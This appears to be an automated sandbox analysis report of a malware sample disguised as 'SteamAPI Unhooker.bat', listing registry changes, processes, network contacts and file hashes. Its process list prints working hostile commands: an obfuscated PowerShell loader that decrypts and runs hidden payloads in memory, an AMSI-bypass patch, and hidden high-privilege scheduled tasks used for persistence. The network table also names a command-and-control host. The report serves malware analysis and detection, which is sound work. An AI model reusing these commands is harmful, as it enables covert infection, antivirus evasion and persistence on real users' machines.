| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_851_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_851.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_851.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_851.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_851.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_851.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IuyCWJkisuTU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YAzhxpEmyrHkOT,[Parameter(Position=1)][Type]$CfNhPfEYyU)$kDaEVTJdpod=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+'a'+'te'+'T'+''+'y'+'p'+[Char](101)+'','Cl'+'a'+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+'o'+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$kDaEVTJdpod.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+','+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$YAzhxpEmyrHkOT).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$kDaEVTJdpod.DefineMethod('In'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+',V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$CfNhPfEYyU,$YAzhxpEmyrHkOT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'na'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $kDaEVTJdpod.CreateType();}$POrcYcWUgJBIf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+'ft'+'.'+''+'W'+''+[Char](105)+'n'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'Nati'+[Char](118)+'eMeth'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$wNchLwuaiowFYq=$POrcYcWUgJBIf.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+'dr'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$nWBlBrwJgsiKqphXiUC=IuyCWJkisuTU @([String])([IntPtr]);$pNyfmIKSXoTTmSDdmHUKNX=IuyCWJkisuTU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HNuYCnQvHyE=$POrcYcWUgJBIf.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'H'+'a'+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$cZwTOoVxWgYzMx=$wNchLwuaiowFYq.Invoke($Null,@([Object]$HNuYCnQvHyE,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$gPyFsZSGxwzeqVVQX=$wNchLwuaiowFYq.Invoke($Null,@([Object]$HNuYCnQvHyE,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$MLoamvq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cZwTOoVxWgYzMx,$nWBlBrwJgsiKqphXiUC).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$HLydpmzCDUFRYIBYp=$wNchLwuaiowFYq.Invoke($Null,@([Object]$MLoamvq,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'ff'+'e'+''+'r'+'')));$sqstUVUVCh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gPyFsZSGxwzeqVVQX,$pNyfmIKSXoTTmSDdmHUKNX).Invoke($HLydpmzCDUFRYIBYp,[uint32]8,4,[ref]$sqstUVUVCh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HLydpmzCDUFRYIBYp,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gPyFsZSGxwzeqVVQX,$pNyfmIKSXoTTmSDdmHUKNX).Invoke($HLydpmzCDUFRYIBYp,[uint32]8,0x20,[ref]$sqstUVUVCh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d406b1dd-2799-49a1-a67c-f1f0a392fa31}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
Files
memory/2768-0-0x000000007516E000-0x000000007516F000-memory.dmp
memory/2768-1-0x00000000036B0000-0x00000000036E6000-memory.dmp
memory/2768-2-0x0000000005F30000-0x000000000655A000-memory.dmp
memory/2768-3-0x0000000075160000-0x0000000075911000-memory.dmp
memory/2768-4-0x0000000075160000-0x0000000075911000-memory.dmp
memory/2768-5-0x0000000005CF0000-0x0000000005D12000-memory.dmp
memory/2768-6-0x0000000005E90000-0x0000000005EF6000-memory.dmp
memory/2768-7-0x0000000006560000-0x00000000065C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k1jzjipa.xis.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2768-16-0x00000000065D0000-0x0000000006927000-memory.dmp
memory/2768-17-0x0000000006A80000-0x0000000006A9E000-memory.dmp
memory/2768-18-0x0000000006AC0000-0x0000000006B0C000-memory.dmp
memory/2768-19-0x00000000092D0000-0x000000000994A000-memory.dmp
memory/2768-20-0x0000000007040000-0x000000000705A000-memory.dmp
memory/2768-21-0x0000000006FE0000-0x0000000006FE8000-memory.dmp
memory/2768-22-0x0000000008CF0000-0x0000000008DE2000-memory.dmp
memory/2768-23-0x000000000AF00000-0x000000000B4A6000-memory.dmp
memory/3904-25-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-26-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-35-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-36-0x0000000007840000-0x0000000007874000-memory.dmp
memory/3904-37-0x0000000071350000-0x000000007139C000-memory.dmp
memory/3904-47-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-46-0x0000000007800000-0x000000000781E000-memory.dmp
memory/3904-48-0x0000000007920000-0x00000000079C4000-memory.dmp
memory/3904-49-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-50-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-51-0x0000000007A30000-0x0000000007A3A000-memory.dmp
memory/3904-52-0x0000000007C40000-0x0000000007CD6000-memory.dmp
memory/3904-53-0x0000000007BD0000-0x0000000007BE1000-memory.dmp
memory/3904-54-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-57-0x0000000075160000-0x0000000075911000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da41906e3c36aed8ef2af440082efe62 |
| SHA1 | 9a1dfe14214818840b9733ee63ed32f8e8a67d36 |
| SHA256 | d9eb2b01802a3809872c433dfcdc55b00f682da62366afbcfefc7d6fc469ec52 |
| SHA512 | 9453fe8441c1baff1dac83f19ecfa595ea94e1a8d718e4e23953e0855e0a54f190979d1f8c11dd9a7c12469d40aeb18b140ac34448f6b1af3b082a256c60d68c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 8ba8fc1034d449222856ea8fa2531e28 |
| SHA1 | 7570fe1788e57484c5138b6cead052fbc3366f3e |
| SHA256 | 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2 |
| SHA512 | 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b |
C:\Users\Admin\AppData\Roaming\startup_str_851.vbs
| MD5 | 9b1f7fd1afd17850c5f8cd9d0224cea6 |
| SHA1 | 5a60b6f7d7883e3586cad39e2e4ca0d4afe40b3e |
